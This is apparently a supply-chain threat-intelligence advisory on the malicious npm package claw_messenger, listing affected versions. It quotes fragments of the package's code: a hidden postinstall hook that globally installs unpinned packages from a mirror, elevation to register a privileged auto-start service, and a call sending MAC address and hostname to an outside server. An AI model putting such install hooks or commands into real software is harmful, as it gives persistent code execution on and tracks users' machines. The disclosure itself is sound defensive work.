Supply-chain threat intelligence

Incident detail

critical · npm · maintainer compromise · osv

Malicious code in claw_messenger (npm)

claw_messenger

Risk score

92

AI summary

Indexed incident for claw_messenger (npm).

Description

The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during npm install.

(1) spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com',...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true }) silently performs a global npm install of opencode-ai from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that the author or any future hijacker of that name can mutate.

(2) An update-silent-service flow loads dist/service-installer.js, which runs execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 }) against a mutable @latest tag; dist/daemon-manager.js then elevates and registers the resulting binary as a privileged auto-start system service: on Windows via Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs, on Linux via systemd with pkexec/sudo, on macOS via osascript... with administrator privileges.

The combination — install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration — gives the author (and anyone who later compromises opencode-ai or claw-subagent-service) persistent root/Administrator code execution on every machine that installs claw_messenger.

Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load. This is undocumented device-tracking telemetry, but it is secondary to the install-time RCE surface.

Technical details

Affected versions

=0.0.76, =0.0.81, =0.0.78, =0.0.79, =0.0.77, =0.0.95, =0.0.94, =0.0.80, =0.0.89, =0.0.83, =0.0.91, =0.0.84, =2.1.1, =2.1.5, =2.1.3, =2.1.4

Indicators

  • affected version =0.0.76 (75%)
  • affected version =0.0.81 (75%)
  • affected version =0.0.78 (75%)
  • affected version =0.0.79 (75%)
  • affected version =0.0.77 (75%)
  • affected version =0.0.95 (75%)
  • affected version =0.0.94 (75%)
  • affected version =0.0.80 (75%)
  • affected version =0.0.89 (75%)
  • affected version =0.0.83 (75%)
  • affected version =0.0.91 (75%)
  • affected version =0.0.84 (75%)
  • affected version =2.1.1 (75%)
  • affected version =2.1.5 (75%)
  • affected version =2.1.3 (75%)
  • affected version =2.1.4 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents